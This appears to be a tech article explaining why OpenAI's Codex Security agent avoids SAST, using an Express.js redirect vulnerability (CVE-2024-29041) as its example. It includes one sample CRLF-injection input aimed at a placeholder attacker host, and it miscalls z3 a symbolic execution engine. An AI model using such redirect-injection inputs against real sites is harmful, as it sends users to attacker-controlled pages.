OpenAI built a vulnerability detection agent. It won't start with a SAST report.
Codex Security, which launched March 6 as a dedicated scanning agent, deliberately excluded static application security testing (SAST) as a starting point. The decision is documented in a blog post published in late March 2026, and it is the most substantive technical explanation of the tradeoff that a major AI lab has published.
The transformation chain problem
SAST tools trace dataflow: find where untrusted input enters, follow it through the program, flag where it reaches a sensitive sink without sanitization. It is a clean model. It catches real bugs.
OpenAI's post argues that the vulnerabilities defenders care most about are not dataflow problems. They look like this: code receives a redirect URL, validates it against an allowlist regex, URL-decodes it, then passes it to a redirect handler. A SAST tool sees the flow and flags nothing wrong. The check ran.
The actual vulnerability is that the regex validation happens before decoding. An attacker submits https://evil.com%0d%0aLocation:%20https://target.com. The allowlist sees a benign URL. The decoder produces a newline-injected redirect. The handler follows it. The dataflow is trivially traceable. The bug exists because the invariant "this check constrains the value" breaks after the transformation chain.
CVE-2024-29041, recorded in the National Vulnerability Database, is a real instance of this pattern in Express.js. URL-encoded newlines in Location headers could bypass common allowlist implementations because interpretation happened after normalization, not before. Snyk and the GitHub Advisory Database both record the same pattern.
This is not exotic. OpenAI's argument is that most of the vulnerabilities that matter have this structure: validation logic that appears to guarantee a property but loses that guarantee through the transformations that follow it.
Why SAST cannot close the gap
SAST has to make approximations to stay tractable. It reasons about code without executing it, which means it cannot definitively answer whether a sanitization function is sufficient for a specific rendering context, encoding behavior, or downstream transformation. It sees that a sanitizer ran. It cannot determine whether the right sanitizer ran for the right interpretation.
That is not a knock on the technology. It is the structural limit of the approach.
OpenAI's position is that feeding pre-computed SAST findings into an agent reasoning loop creates three predictable failure modes. The findings list becomes a map of where the tool already looked, biasing the agent toward those regions. The SAST report embeds implicit judgments about sanitization sufficiency that the agent inherits without re-examining. And the reasoning system becomes harder to evaluate, because the agent is confirming or dismissing findings rather than discovering them independently.
What Codex Security does instead
The architecture starts with the repository itself: its trust boundaries, intended behavior, and threat model. When the system encounters what looks like validation or sanitization, it does not treat it as resolved. It tries to falsify the guarantee.
The methods are concrete. The agent reads code paths with full repository context and does not give comments undue weight. It reduces complex chains to minimal testable slices and writes micro-fuzzers targeting those slices specifically. Where appropriate, it formalizes constraint problems as satisfiability queries and solves them through z3, a symbolic execution engine. And when execution is feasible, it runs end-to-end proofs of concept in sandboxed environments.
The shift is from "a check exists" to "the invariant holds, and here is the evidence."
The industry angle
OpenAI is not the first to argue that SAST has structural limits. The security community has debated dataflow versus semantic analysis for years. But a major lab publishing a detailed technical post explaining why its agentic security product deliberately excludes SAST as a starting point is a different kind of signal.
It means the product is built around a bet: that the vulnerability class defenders are actually missing is not the one SAST finds most efficiently. It means the agent needs to approach each codebase without the prior bias that a findings list introduces. And it means evaluation of the system has to be based on what the agent discovers independently, not what it confirms from pre-existing reports.
Whether that bet is right is an empirical question. The post is notable because it is the kind of technical honesty that rarely comes from a product launch.
The CVE
CVE-2024-29041 affected Express.js versions prior to 4.19.0. The dataflow is straightforward, the transformation order mistake is visible in retrospect, and the fix is well-documented. It is the ideal case for demonstrating why "the check exists" and "the system is safe" are not the same claim.